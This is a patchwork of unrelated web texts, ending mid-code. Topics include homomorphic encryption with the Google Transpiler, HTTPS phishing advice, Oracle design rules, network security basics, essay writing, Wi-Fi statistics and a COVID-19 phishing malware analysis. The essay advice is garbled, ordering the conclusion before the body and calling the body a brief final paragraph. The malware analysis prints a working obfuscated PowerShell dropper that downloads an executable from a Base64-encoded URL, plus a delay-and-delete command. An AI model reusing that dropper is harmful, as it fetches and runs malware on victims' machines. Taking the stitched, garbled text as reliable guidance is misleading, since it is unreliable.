One more twist: the number of multiplication operations that can be performed on a ciphertext is limited by parameters specified at run time. The more sequential multiplications a particular data path has (referred to as multiplicative “depth”), the larger the ciphertext must be, and the longer the computation takes. Eventually, a limit is reached, and one must execute a “bootstrapping” function. Ciphertexts all contain some encryption “noise”, and this noise increases with each multiplication operation. The depth is the limit after which the noise becomes too large for us to successfully decrypt the ciphertext. Bootstrapping basically resets the encryption noise accumulated in a ciphertext after multiple encrypted computations. Bootstrapping is very computationally intensive and is only used in systems with very large computational depth requirements.
Note that there are operations that are missing from those we would expect from a general-purpose computer. There is no division, no nonlinear functions, and no user-level comparison operations. To get around this, researchers have implemented missing functions using polynomial and other numerical approximation techniques. Computing comparison using the polynomial approach has several challenges, e.g., the input range must be known in advance, and a high multiplicative depth (large-degree polynomial) is needed. Simply determining if x is greater than y when both are encrypted has only recently been accomplished by converting vector ciphertexts into vectors of Boolean ciphertexts and performing the comparison in that scheme.
Boolean (Digital) Circuits to the Rescue
The BinFHE schemes allow us to perform most two-input, one-output Boolean gate operations in encrypted form. Since their input and output ciphertexts each encrypt a single bit, they can perform bootstrapping in a way that is much more efficient than the vector schemes, to the point where most implementations perform bootstrapping after every gate computation. A sufficient set of Boolean operations is supported in OpenFHE to enable us to implement any arbitrary combinatorial circuit, limited only by the size of the system memory and the patience of the user running the code.
With BinFHE, the computation of a comparison is achieved in a straightforward manner.
Figure 1 shows the digital logic circuit that performs the three comparison operations (greater than, less than, and equal) for two four-bit inputs. It can easily be extended to larger integers. However, implementing this circuit directly in a Boolean scheme is not easy. There are three approaches we could use:
Approach 1: By hand
I would design the circuit, break it down into gates and nodes (i.e., wires), each node being a one-bit ciphertext and each gate being the appropriate OpenFHE call for the particular gate. Then systematically lay out the code (going left to right, top to bottom) that will execute the circuit using OpenFHE calls. Trust me, this is both tedious and error-prone, and is not practical for circuits of any significant size.
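Even for the small four-bit case, the hand-written version takes care. In plaintext Python, with ordinary bit operators standing in for OpenFHE gate calls, the comparison logic of Figure 1 behaves roughly as below; this is a behavioral sketch, not the figure's exact gate layout.

```python
def compare_bits(a_bits, b_bits):
    """Compare two equal-width integers given as bit lists, MSB first.
    Returns (gt, lt, eq) using only gate-level Boolean operations."""
    gt = lt = 0
    eq = 1
    for a, b in zip(a_bits, b_bits):       # scan from most significant bit
        gt = gt | (eq & a & (1 - b))       # first differing bit decides
        lt = lt | (eq & (1 - a) & b)
        eq = eq & (1 - (a ^ b))            # XNOR: bits equal so far
    return gt, lt, eq

def to_bits(x, width=4):                   # MSB-first bit vector
    return [(x >> i) & 1 for i in reversed(range(width))]

print(compare_bits(to_bits(9), to_bits(5)))   # (1, 0, 0): 9 > 5
print(compare_bits(to_bits(3), to_bits(3)))   # (0, 0, 1): equal
```

In the encrypted version, every `&`, `|`, `^`, and `1 -` above would become one OpenFHE gate evaluation on one-bit ciphertexts, and each intermediate value a ciphertext to keep track of, which is exactly why the hand approach does not scale.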
Approach 2: Build a generic circuit emulator
I could write code that reads in a circuit description from a file (consisting of labeled nodes and gates) and automagically generates and executes the OpenFHE calls for each gate in the correct order. This is a non-trivial piece of code, but if you want to kick the tires, fortunately I have already written it. It is available as an example application in the PALISADE repository and will soon be available for OpenFHE. While there are some big circuits in the repo, the data I/O is still basically limited to a small number of simple integers of fixed bit-width (i.e., one or two inputs, and one or two outputs).
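The idea behind such an emulator can be sketched in a few lines: read a netlist of (output node, gate, input nodes) entries and evaluate them in order. In the encrypted version the dictionary would hold one-bit ciphertexts and each gate would be the corresponding OpenFHE gate call; here plain integers stand in for the ciphertexts, and the netlist format is made up for illustration.

```python
GATES = {
    "AND":  lambda a, b: a & b,
    "OR":   lambda a, b: a | b,
    "XOR":  lambda a, b: a ^ b,
    "NAND": lambda a, b: 1 - (a & b),
}

def run_circuit(netlist, inputs):
    """netlist: list of (out_node, gate_name, in_node_1, in_node_2),
    listed in an order where every node is defined before it is used."""
    nodes = dict(inputs)                    # node name -> bit value
    for out, gate, x, y in netlist:
        nodes[out] = GATES[gate](nodes[x], nodes[y])
    return nodes

# A half adder: sum = a XOR b, carry = a AND b
half_adder = [("sum", "XOR", "a", "b"), ("carry", "AND", "a", "b")]
result = run_circuit(half_adder, {"a": 1, "b": 1})
print(result["sum"], result["carry"])   # 0 1
```

A real emulator adds file parsing, topological ordering, and error handling, but the core loop is exactly this: one table lookup and one gate evaluation per netlist line.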
Approach 3: Use the Google Transpiler
The Google Transpiler is a new open-source tool written by our collaborators at Google that will translate C++ code into hardware design language (HDL) code that describes the functionality of the original code as a digital circuit. It can then execute the circuit in encrypted form using one of multiple cryptographic libraries, but I will focus on our experiences with OpenFHE.
Translation + Compiler = Google Transpiler
The Google Transpiler is a new system that converts a subset of C++ into a Boolean circuit and integrates OpenFHE’s Boolean schemes as a computational backend to evaluate the circuits with encrypted inputs and outputs. Generally, you write your application using a specific subset of C++ (the limitation is that not all C++ code can be converted to a static combinatorial digital circuit). You specifically encode/encrypt your sensitive input data and specify functions that will be converted to encrypted operations.
The system can be compiled into a “cleartext” form where all variables are encoded into bits, and the resulting circuits executed in the clear. This runs fast, and lets you confirm the correctness of your system. With a small number of changes, this code can be converted to an encrypted form. Running in encrypted form encodes and encrypts the C++ variables as vectors of encrypted bits and executes the functions using OpenFHE calls to the various gates. The conversion of C++ into gates happens under the hood, and you can easily generate very large circuits with little effort. Furthermore, Google has incorporated the Yosys open-source HDL tool chain to generate efficient circuits for execution and included an “interpreted mode” that executes the encrypted gates in parallel across all available cores in your system.
The transpiler supports signed and unsigned integers, shorts, and chars, as well as bool. These are represented internally as vectors of ciphertexts (each encrypting one bit). Floating point is not currently supported, nor is pointer arithmetic. The power of the transpiler becomes apparent when you look at larger, more complex data structures that are supported. You can specify fixed-length multi-dimensional vectors and arbitrary structures. The transpiler takes care of all the bookkeeping that keeps all the underlying ciphertexts straight.
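The bit-vector representation described above can be mimicked in a few lines; in the real system each bit below would be a separate ciphertext rather than a plain integer. The widths follow the text (32 bits for an unsigned int, 8 for a char).

```python
def encode(value, width):
    """Represent an unsigned value as a list of bits (LSB first); in the
    transpiler each of these bits becomes one ciphertext."""
    return [(value >> i) & 1 for i in range(width)]

def decode(bits):
    return sum(b << i for i, b in enumerate(bits))

bits = encode(300, 32)
assert len(bits) == 32          # an unsigned int costs 32 ciphertexts
print(decode(bits))             # 300
```

Fixed-length arrays and structs are then just concatenations of these per-field bit vectors, which is the bookkeeping the transpiler handles for you.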
An example application: picking the most efficient of two paths
I built a graph-processing application that computes a shortest path. In this application we take two data structures, each containing an unsigned integer field called "cost" and a vector of unsigned integers representing a path through a series of nodes in a graph. The goal is to select the struct with the smaller cost. This can be applied sequentially across multiple input paths, allowing us to select the path with the smallest associated cost, solving a shortest-path problem.
The structure is defined with conventional C++ code in Figure 2. Some observations: since the data is going to be encrypted, we must define the vector as a fixed-length array and store the actual length of the array that contains valid data. Otherwise, if the array were allowed to be dynamic, the length of the vector (based on the number of encoded ciphertexts) would be visible. Internally, an encrypted PathStruct is stored as a vector of 1000 ciphertexts (one unsigned int is 32 bits, so the entire structure is 32 + 8 + 30 * 32 = 1000 bits). One of the beauties of the Google Transpiler is that it takes care of the underlying ciphertext management; coding this by hand would be very cumbersome (and error-prone).
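The 1000-bit figure follows directly from the field widths. A quick bookkeeping sketch, with field names as a hypothetical mirror of PathStruct (the 8-bit field is assumed here to be the stored valid-length):

```python
# Hypothetical mirror of PathStruct's bit budget: one 32-bit cost,
# an 8-bit valid-length field, and a fixed 30-entry path of 32-bit ints.
FIELDS = {"cost": 32, "length": 8, "path": 30 * 32}
total_bits = sum(FIELDS.values())
print(total_bits)   # 1000 -> one ciphertext per bit when encrypted
```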
The encrypted function is listed in Figure 3. It takes two encrypted input PathStructs and returns a copy of the one that has the smaller cost.
Some more observations: the result of the cost comparison is captured in the bool chooseNew. We need to copy every element of the lowest-cost struct, one by one, into an output copy using the conditional ternary operator a?b:c. The first #pragma statement tells the Google Transpiler that this is the entry point of the transpiled code. The transpiled function can consist of several function modules specified in the same files, but the entry point needs to be explicitly called out. The second #pragma statement indicates that the loop must be unrolled before it is converted to logic gates (generated circuits are always combinatorial, not sequential). A word of caution: unrolled loops generate duplicate code for every iteration, so doubly nested unrolled loops can lead to extremely large circuits!
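Under the hood, each a?b:c on encrypted data becomes a per-bit multiplexer. One standard gate-level formulation (not necessarily the exact gates the tool emits) is out = (sel AND b) OR (NOT sel AND c), applied across every bit of the encoded struct:

```python
def mux_bit(sel, b, c):
    """Gate-level ternary: returns b when sel is 1, else c."""
    return (sel & b) | ((1 - sel) & c)

def mux_vector(sel, b_bits, c_bits):
    """Apply the one-bit mux across every bit of an encoded struct."""
    return [mux_bit(sel, b, c) for b, c in zip(b_bits, c_bits)]

old = [1, 0, 1, 1]
new = [0, 1, 1, 0]
print(mux_vector(1, new, old))   # chooseNew = 1 -> [0, 1, 1, 0]
print(mux_vector(0, new, old))   # chooseNew = 0 -> [1, 0, 1, 1]
```

Scaled to the 1000-bit PathStruct, this one ternary expression already accounts for thousands of gate evaluations, which is why loop unrolling inflates circuits so quickly.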
The top-level code for cleartext execution mode is shown in Figure 4. Instead of encrypting ciphertext, we make encoded versions of PathStruct, encode our data as plaintext bits, and execute the transpiled function in the clear. The transpiled circuit execution is the select_path() function call, wrapped with the XLS_CHECK() function to provide some error checking in case the execution fails. Notice that the return value is added as a final parameter in the function call. Running code in this mode quickly verifies that the functionality is correct.
The top-level code for OpenFHE mode (encrypted) is shown in Figure 5 and is very similar to the cleartext version, with the following additions. An OpenFHE crypto context and the generation of keys are required at the beginning of the program. The secret key is used to encrypt and decrypt the data (OpenFHE currently supports only symmetric-key operation for Boolean schemes, with public/private-key operation slated for the next major release). In a real-world application, one program would use the secret key to encrypt and decrypt ciphertexts, transmitting them to a different application that performs the computation (without knowledge of the secret key). The "encoding" and "decoding" operations in the code are replaced with "encrypt" and "decrypt" operations that require the secret key sk. The circuit execution of the function select_path() is identical except for the addition of the crypto context as a parameter.
Google Transpiler and OpenFHE Performance:
The operation counts of the circuit generated by the transpiler for select_path() are summarized in Table 1. It consists of 2214 internal nodes (wires), which correspond to individual one-bit ciphertexts. The I/O (three copies of PathStruct) consists of 3000 ciphertexts. Internally there are 3159 encrypted gate evaluations, i.e., calls to OpenFHE's binary-gate operations. Imagine generating this code by hand!
Next Steps for OpenFHE and the Google Transpiler
The OpenFHE team is working closely with Google to improve both OpenFHE's BinFHE implementation and the transpiler itself. Our eventual goal is to enable a wider array of data types, such as mixing Boolean, integer, and approximate floating-point schemes under the hood to support more efficient operations. The OpenFHE team is currently working on the ability to convert between CKKS and FHEW ciphertexts, allowing users to compute on floating-point data and perform comparison operations as well. This will enable the implementation of valuable applications such as decision trees. We are also working to increase the number of Boolean gate components supported by OpenFHE, which will lead to even more efficient circuit implementations.
Meanwhile we are using the Google Transpiler to explore encrypting other algorithms for new application domains. Stay tuned for future blog posts on this subject – or, join the OpenFHE community here.
You’ve likely been advised to check for the padlock icon or HTTPS designation on a website as an indicator that it is secure and you can safely share your data. Well, that may be changing. According to the FBI, cybercriminals are more often incorporating website certificates—third-party verification that a site is secure—when they send phishing emails. There are steps you can take to reduce the likelihood of falling victim to HTTPS phishing, and they rely on your attention and common sense.
It’s Estimated That Half of All Phishing Sites Now Have the Padlock Icon
One report found that roughly half of all phishing scams are now hosted on websites whose addresses include both the padlock and HTTPS designation.
So what’s going on?
Theories vary, but some experts believe that scammers use the padlock more often because it’s become easier and cheaper for website creators to use an encrypted connection. Criminals may be able to get their own certificates to secure pages used in their phishing campaigns, and they can often do so without having to reveal much information about who they really are. Other bad actors may abuse pages hosted on cloud services, which sometimes allow them to automatically inherit the security certificate.
However it’s occurring, the criminal’s goal is typically the same: to lure victims to a malicious website that appears to be secure in order to acquire the victim’s login or other sensitive information.
Steps to Help Reduce the Risk of Falling Victim to HTTPS Phishing
Fortunately, there are steps to help reduce the likelihood of falling victim to an HTTPS scam. Perhaps the most important advice is this: consumers have to be more diligent than ever by checking for more than one sign that a website is legitimate.
- The FBI advises not to trust a website just because it has a padlock icon or HTTPS in the address bar.
- If you receive a suspicious email with a link, even from someone you know, first confirm that the message is legitimate by calling or emailing the person yourself. Never reply directly to suspicious emails.
- Check to make sure a website’s URL is correct. For example, look for misspellings or wrong domains, such as a .net domain that would normally be a .com domain. It’s a best practice to type the URL of the website you want to visit directly into the browser instead of following a link you received in an email.
- Consider installing tools like a password manager or security software. Those tools sometimes include features that can warn you when a URL doesn’t match the legitimate website or can prevent you from opening a scam site.
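The "check the URL" advice above can be partially automated. The sketch below flags a hostname whose registrable domain is not on a personal allowlist, catching the wrong-TLD case mentioned earlier (e.g. a .net domain that should be .com). It is a deliberately naive illustration, not a substitute for security software; the allowlist entries are placeholders.

```python
from urllib.parse import urlparse

TRUSTED = {"example.com", "idwatchdog.com"}   # your own allowlist

def registrable_domain(url):
    host = urlparse(url).hostname or ""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host

def looks_suspicious(url):
    # HTTPS alone proves nothing (the article's point); check the domain too.
    return registrable_domain(url) not in TRUSTED

print(looks_suspicious("https://www.example.com/login"))  # False
print(looks_suspicious("https://example.net/login"))      # True: wrong TLD
```

Real password managers and security tools apply much richer checks (homoglyph detection, reputation feeds), but the principle is the same: verify the domain, not the padlock.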
What to Do if You Suspect HTTPS Phishing
The FBI encourages victims to report suspicious activity to their local FBI field office, as well as file a complaint with the IC3 at www.ic3.gov. If the complaint relates to this particular scam, the FBI recommends noting “HTTPS phishing” in the message.
Automation describes a process of minimizing the human input required to accomplish a task. This can be done digitally using applications, programming or scripts. Businesses use automation to deliver products and services faster. The manufacturing industry has been a long-time automation user, applying it to product fabrication and assembly. Software algorithms have expanded automation adoption to many digital tasks.
Artificial intelligence and machine learning make it easy to use automation in today’s digital-first environments. Many practical automation use cases involve data management — entering, cleansing or analyzing data. You can also automate decision-making based on defined conditions.
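The "automate decision-making based on defined conditions" idea reduces to a small rule engine. The sketch below cleanses a record and then applies condition-to-action rules in priority order; field names and thresholds are invented for illustration.

```python
def cleanse(record):
    """Normalize free-form input before any automated decision."""
    return {k: v.strip().lower() if isinstance(v, str) else v
            for k, v in record.items()}

RULES = [  # (condition, decision) pairs, checked in order
    (lambda r: r["amount"] > 10_000, "route_to_human_review"),
    (lambda r: r["country"] != "us", "extra_verification"),
    (lambda r: True,                 "auto_approve"),
]

def decide(record):
    record = cleanse(record)
    return next(action for cond, action in RULES if cond(record))

print(decide({"amount": 500,   "country": " US "}))   # auto_approve
print(decide({"amount": 50000, "country": "us"}))     # route_to_human_review
```

Note how the routine work (trimming and lowercasing data, applying the same thresholds every time) is exactly the kind of mundane task automation handles well, leaving the flagged cases for people.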
While automation offers many potential solutions to complex issues, it’s most effective for mundane and routine tasks. This helps increase efficiency and accuracy, so that employees can spend more time on strategic work.
It is worthwhile to sum up in a single place all the major issues in designing Oracle database applications—thus “The Commandments” (or perhaps “The Suggestions”). Their presentation does not assume that you need to be told what to do, but rather that you are capable of making rational judgments and can benefit from the experience of others facing the same challenges. The purpose here is not to describe the development cycle, which you probably understand better than you want to, but rather to bias that development with an orientation that will radically change how the application will look, feel, and be used. Careful attention to these ideas can dramatically improve the productivity and happiness of an application’s users.
The ten commandments of humane database application design:
- Include users. Put them on the project team and teach them the relational model and SQL.
- Name tables, columns, keys, and data jointly with the users. Develop an application thesaurus to ensure name consistency.
- Use English words that are meaningful, memorable, descriptive, short, and singular. Use underscores consistently or not at all.
- Don’t mix levels in naming.
- Avoid codes and abbreviations.
- Use meaningful keys where possible.
- Decompose overloaded keys.
- Analyze and design from the tasks, not just the data. Remember that normalization is not design.
- Move tasks from users to the machine. It is profitable to spend cycles and storage to gain ease of use.
- Don’t be seduced by development speed. Take time and care in analyses, design, testing, and tuning.
If you have a poor design, your application will suffer no matter what commands you use. Plan for functionality, plan for performance, plan for recoverability, plan for security, and plan for availability. Plan for success.
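Some of the naming commandments can even be checked mechanically. The sketch below lints candidate table names against three of them (short, consistent lowercase underscores and no codes, singular nouns); the heuristics and the abbreviation blacklist are invented and deliberately crude.

```python
import re

ABBREVIATIONS = {"cust", "acct", "trx", "emp"}   # illustrative blacklist

def lint_name(name):
    problems = []
    if len(name) > 30:                            # classic Oracle limit
        problems.append("too long")
    if not re.fullmatch(r"[a-z]+(_[a-z]+)*", name):
        problems.append("use lowercase words with consistent underscores")
    if any(part in ABBREVIATIONS for part in name.split("_")):
        problems.append("avoid codes and abbreviations")
    if name.split("_")[-1].endswith("s"):         # crude plural check
        problems.append("use singular nouns")
    return problems

print(lint_name("worker"))      # []
print(lint_name("cust_accts"))  # ['avoid codes and abbreviations', 'use singular nouns']
```

A real project would drive such checks from the application thesaurus agreed with users, so the tooling enforces the names everyone chose together.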
What is Network Security?
Network Security protects your network and data from breaches, intrusions and other threats. This is a vast and overarching term that describes hardware and software solutions as well as processes or rules and configurations relating to network use, accessibility, and overall threat protection.
Network Security involves access control, virus and antivirus software, application security, network analytics, types of network-related security (endpoint, web, wireless), firewalls, VPN encryption and more.
Benefits of Network Security
Network Security is vital in protecting client data and information, keeping shared data secure and ensuring reliable access and network performance as well as protection from cyber threats. A well designed network security solution reduces overhead expenses and safeguards organizations from costly losses that occur from a data breach or other security incident. Ensuring legitimate access to systems, applications and data enables business operations and delivery of services and products to customers.
Types of Network Security Protections
Firewalls control incoming and outgoing traffic on networks, with predetermined security rules. Firewalls keep out unfriendly traffic and are a necessary part of daily computing. Network Security relies heavily on Firewalls, and especially Next Generation Firewalls, which focus on blocking malware and application-layer attacks.
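A firewall's "predetermined security rules" are, at heart, an ordered match list with a default action. The sketch below evaluates first-match-wins rules over (port, source) pairs; the rule contents are illustrative, and the source matching is exact-match only (real firewalls match CIDR ranges and much more).

```python
RULES = [  # evaluated top-down; first match wins
    {"action": "allow", "port": 443, "src": "any"},
    {"action": "deny",  "port": 23,  "src": "any"},      # block telnet
    {"action": "allow", "port": 22,  "src": "10.0.0.5"}, # one admin host
]

def matches(rule, port, src):
    return rule["port"] == port and rule["src"] in ("any", src)

def filter_packet(port, src, default="deny"):
    for rule in RULES:
        if matches(rule, port, src):
            return rule["action"]
    return default            # default-deny posture

print(filter_packet(443, "203.0.113.7"))   # allow
print(filter_packet(23, "203.0.113.7"))    # deny
print(filter_packet(8080, "203.0.113.7"))  # deny (no rule matched)
```

The default-deny fallback is the important design choice: anything not explicitly permitted is refused.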
Network segmentation defines boundaries between network segments where assets within the group have a common function, risk or role within an organization. For instance, the perimeter gateway segments a company network from the Internet. Potential threats outside the network are prevented, ensuring that an organization’s sensitive data remains inside. Organizations can go further by defining additional internal boundaries within their network, which can provide improved security and access control.
What is Access Control?
Access control defines the people or groups and the devices that have access to network applications and systems, thereby denying unsanctioned access and, with it, possible threats. Integrations with Identity and Access Management (IAM) products can strongly identify the user, and Role-based Access Control (RBAC) policies ensure the person and device are authorized to access the asset.
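The RBAC idea mentioned above boils down to two lookups: user to roles, and role to permissions. A minimal sketch follows, with role and permission names invented for illustration.

```python
ROLE_PERMISSIONS = {
    "engineer": {"read:repo", "write:repo"},
    "auditor":  {"read:repo", "read:logs"},
}
USER_ROLES = {"alice": {"engineer"}, "bob": {"auditor"}}

def is_authorized(user, permission):
    """Grant access only if some role of the user carries the permission."""
    return any(permission in ROLE_PERMISSIONS.get(role, set())
               for role in USER_ROLES.get(user, set()))

print(is_authorized("alice", "write:repo"))  # True
print(is_authorized("bob", "write:repo"))    # False: auditors read only
```

Because permissions hang off roles rather than individuals, revoking access is a single dictionary change, which is the administrative win RBAC is designed for.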
Remote Access VPN
Remote access VPN provides remote and secure access to a company network to individual hosts or clients, such as telecommuters, mobile users, and extranet consumers. Each host typically has VPN client software loaded or uses a web-based client. Privacy and integrity of sensitive information is ensured through multi-factor authentication, endpoint compliance scanning, and encryption of all transmitted data.
Zero Trust Network Access (ZTNA)
The zero trust security model states that a user should only have the access and permissions that they require to fulfill their role. This is a very different approach from that provided by traditional security solutions, like VPNs, that grant a user full access to the target network. Zero trust network access (ZTNA) also known as software-defined perimeter (SDP) solutions permits granular access to an organization’s applications from users who require that access to perform their duties.
Email security refers to any processes, products, and services designed to keep your email accounts and email content safe from external threats. Most email service providers have built-in email security features designed to keep you secure, but these may not be enough to stop cybercriminals from accessing your information.
Data Loss Prevention (DLP)
Data loss prevention (DLP) is a cybersecurity methodology that combines technology and best practices to prevent the exposure of sensitive information outside of an organization, especially regulated data such as personally identifiable information (PII) and compliance related data: HIPAA, SOX, PCI DSS, etc.
Intrusion Prevention Systems (IPS)
IPS technologies can detect or prevent network security attacks such as brute force attacks, Denial of Service (DoS) attacks and exploits of known vulnerabilities. A vulnerability is a weakness for instance in a software system and an exploit is an attack that leverages that vulnerability to gain control of that system. When an exploit is announced, there is often a window of opportunity for attackers to exploit that vulnerability before the security patch is applied. An Intrusion Prevention System can be used in these cases to quickly block these attacks.
Sandboxing is a cybersecurity practice where you run code or open files in a safe, isolated environment on a host machine that mimics end-user operating environments. Sandboxing observes the files or code as they are opened and looks for malicious behavior to prevent threats from getting on the network. For example malware in files such as PDF, Microsoft Word, Excel and PowerPoint can be safely detected and blocked before the files reach an unsuspecting end user.
Hyperscale Network Security
Hyperscale is the ability of an architecture to scale appropriately, as increased demand is added to the system. This solution includes rapid deployment and scaling up or down to meet changes in network security demands. By tightly integrating networking and compute resources in a software-defined system, it is possible to fully utilize all hardware resources available in a clustering solution.
Cloud Network Security
Applications and workloads are no longer exclusively hosted on-premises in a local data center. Protecting the modern data center requires greater flexibility and innovation to keep pace with the migration of application workloads to the cloud. Software-defined Networking (SDN) and Software-defined Wide Area Network (SD-WAN) solutions enable network security solutions in private, public, hybrid and cloud-hosted Firewall-as-a-Service (FWaaS) deployments.
Robust Network Security Will Protect Against
- Virus: A virus is a malicious, downloadable file that can lie dormant and replicates itself by changing other computer programs with its own code. Once it spreads, those infected files can pass the virus from one computer to another, and/or corrupt or destroy network data.
- Worms: Worms can slow down computer networks by eating up bandwidth as well as slowing your computer's ability to process data. A worm is standalone malware that can propagate and work independently of other files, whereas a virus needs a host program to spread.
- Trojan: A trojan is a backdoor program that creates an entryway for malicious users to access the computer system by using what looks like a real program, but quickly turns out to be harmful. A trojan virus can delete files, activate other malware hidden on your computer network, such as a virus and steal valuable data.
- Spyware: Much like its name, spyware is a type of malware that gathers information about a person or organization without their express knowledge and may send the information gathered to a third party without the consumer's consent.
- Adware: Can redirect your search requests to advertising websites and collect marketing data about you in the process so that customized advertisements will be displayed based on your search and buying history.
- Ransomware: This is a type of trojan malware designed to extort money from the person or organization on whose computer it is installed, by encrypting data so that it is unusable and blocking access to the user's system.
Are you having difficulty putting together a written composition? Do you find yourself struggling to construct and arrange an essay that you feel will have the merit to win you a prize or grade? If so, do not give up hope just yet! The fact of the matter is that, although there are plenty of resources on and offline that provide written essay examples and guidance, much of your success boils down to your ability to effectively learn and apply the information you are provided with. Therefore, in this article I will highlight some crucial measures that you can take to improve your essay writing. Hopefully, by the time you've finished reading this, you will have a better understanding of how to develop a good composition and will be able to apply this advice and these examples to your own writing style.
To be able to attain the correct arrangement for your written essay, it is important to first understand the different parts which compose a good essay. By breaking down every step of your essay into its own small segment, you will be better able to analyze your writing and ensure that it comes together in a cohesive manner. If you know how each piece fits into the larger whole and the way each section functions within the bigger picture, then you’re well on your way to creating a good essay.
One of the most important things to keep in mind when constructing an essay is that your thesis needs to be the center of attention. You want to use your thesis statement as the climax of your essay, setting up the main point and the various supporting arguments that you will use to support it. If your thesis is weak, the rest of the essay will sound weak too. Make sure that your thesis statement sells your main point in three easy-to-understand sections: an introduction, a main point, and a conclusion.
The introduction is the first portion of your essay, which lays out your entire argument. It ought to immediately grab the reader’s attention through a catchy headline along with a clear opening paragraph. Use a powerful opening line which leaves your reader with instant confidence. Your introduction needs to paint a clear picture of what you expect to attain through your own writing. This may also be the section in which you’ll be able to begin creating your outline.
The next area of the essay is your conclusion. Unlike the introduction, your conclusion does not have to begin a new paragraph. Nonetheless, this is where you can truly close out the story of your essay by summarizing all of the main points. Summarize the main points of your essay in bullet form, using subheadings to separate the main points from one another. You want to create a clear and succinct statement of why your topic is important and how your conclusion supports it.
The final part of your essay is the body of your work. This consists of a brief paragraph that summarizes your thesis statement or outlines the arguments in your essay. You can use footnotes throughout your work, but your main focus should be on using the appropriate contextual information to strengthen your arguments. Footnotes should be used to show the extent of your research on a specific subject and the textual sources used to support it. Your footnotes should also acknowledge the specific scholarly sources you used.
It’s a question often asked: what is the difference between Cybersecurity as a Service and Incident Response?
The short answer is, Cyber as a Service focuses on the planning and preparation that happens before a security incident, and Cyber Incident Response is concerned with the actions taken immediately after a cyber-attack takes place (or is discovered).
Cybersecurity as a Service is an affordable yet comprehensive way for organizations to assess their cybersecurity program by having an unbiased third party identify its vulnerabilities and weak points. By knowing what areas are vulnerable, companies can address critical risks and create a plan to react to a data breach or other security incident.
Basic tactics of a Cybersecurity as a Service program include:
- Cybersecurity Assessment, where your current security plan is measured against industry best practices. These frameworks may vary based on company, industry, and regulatory requirements.
- Cyber-Attack Simulations are conducted with your Cyber Incident Response Team to find gaps in your response plan and improve your cyber-attack readiness, so you know what to do in the event of an actual security incident.
- Security Plan Development, which creates or updates your current plan based on your cybersecurity assessment. Your plan includes the steps, processes, and personnel resources required to react to a security breach.
Cyber Incident Response is the action taken immediately after a cybersecurity incident, data breach, or other cyber threat happens. Having an Incident Response Plan in place is essential, because a cyber-attack at your business can seriously damage your brand and reputation and expose your competitive advantages and intellectual property to the world.
At a minimum, Cyber Incident Response includes:
- Immediate Incident Response, the initial steps taken to contain and control a security incident. This includes assembling your Cyber Incident Response Team, identifying the cause of the breach, and containing the damage.
- Network and System Restoration inspects your email system, web servers, eCommerce servers, and cloud applications to verify they are free of viruses and malware and that users have access so business operations can continue.
- Damage Remediation confirms that all systems in your IT environment are operational and fixes any that were compromised to ensure they are secure.
- Data Recovery ensures that all data located on servers, business systems, applications, and endpoint devices is accessible and operational.
Cybersecurity as a Service and Cyber Incident Response are not mutually exclusive services; they both have their place in a solid, healthy cyber security program.
Fortress Security Risk Management is a global data protection company that helps organizations dramatically minimize their risk of disruption from unforeseen events like cyber-attacks. We offer both Cybersecurity as a Service and Cyber Incident Response services to help you achieve the highest degree of security and the least amount of risk, or what we call, SecurityCertaintySM.
If you’d like more information on our full spectrum cybersecurity services, contact us today!
It's hard to think back to what life was like without Wi-Fi. Everyday, Americans visit coffee shops, libraries, friends' homes, they sit in airport lounges and train stations and even in their own homes and businesses and Wi-Fi is the technology that keeps them all connected. Business goes on, personal connections stay strong, and news travels fast, as Wi-Fi keeps people up to date and empowers internet users wherever they are.
In the first quarter of last year, 89 percent of U.S. households with broadband used Wi-Fi to connect to the internet. In each household, consumers connect nearly 15 devices to the internet—1.4 billion connected devices in all, most of which rely on Wi-Fi. The latest traffic forecasts predict that Wi-Fi will carry 34 exabytes of data per month by 2021, more than triple the amount it carried in 2016. The stats say it all: people are choosing Wi-Fi to connect and go about their digital lifestyles, and use will only continue to grow exponentially from here.
Cybercriminals continue to exploit the COVID-19 theme in their cyberattacks, trying to trick users into entering their credentials or personal information on a phishing web page or loading malicious documents that pretend to contain essential information related to the COVID-19 pandemic.
Here is a quick roundup of examples that show how scammers and hackers are leveraging the crisis.
Fake financial aid for COVID-19
The state of North Rhine-Westphalia (NRW) in Germany recently fell victim to a phishing campaign. Attackers created rogue copies of the NRW Ministry of Economic Affairs’ website for requesting COVID-19 financial aid. The fraudsters collected the personal data submitted by victims and then submitted their own requests to the legitimate website using the victims’ information but the criminals’ bank account. NRW officials reported that up to 4,000 fake requests had been granted, resulting in up to $109 million being sent to the scammers.
Tricked by free COVID-19 testing
Another COVID-19 fraud case has been reported by Microsoft's Security Intelligence Team. The latest version of Trickbot/Qakbot/Qbot malware has been spread in numerous phishing emails offering free COVID-19 testing. Victims were asked to fill out an attached form, which turned out to be a fake document embedded with a malicious script. To avoid revealing its payload in malware sandboxes, the script wouldn’t start downloading its payload until after some time had passed.
The lure document uses a standard gimmick to trick users into clicking ‘Enable Content’, which allows the embedded malicious VBA script to execute.
The VBA script is obfuscated to avoid detection by antivirus engines.
The attackers use a delay trick based on the Windows choice command, which waits /T <time in seconds> before selecting the default choice ‘Y’. In this case, the script waits 65 seconds before deleting the temporary files:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
While waiting, it downloads a piece of malware using the following PowerShell script:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
After Base64 decoding, the PowerShell script downloads the backdoor from the hacked web server located in Germany:
and saves as:
The folder ‘C:\Users\Public\tmpdir’ has been preliminary created by executing ‘tmps1.bat’ with the following command:
cmd /c mkdir ""C:\Users\Public\tmpdir""
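The Base64 blobs in the PowerShell one-liner above can be decoded directly to recover the indicators of compromise. A quick sketch of that analysis step in Python (the encoded strings are copied verbatim from the script as printed above):

```python
import base64

# The two Base64 strings embedded in the malicious PowerShell command.
url_b64 = ("aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29t"
           "L2ZlYXR1cmUvNzc3Nzc3LnBuZw==")
path_b64 = "QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl"

# Decoding reveals the payload URL (the hacked German web server) and
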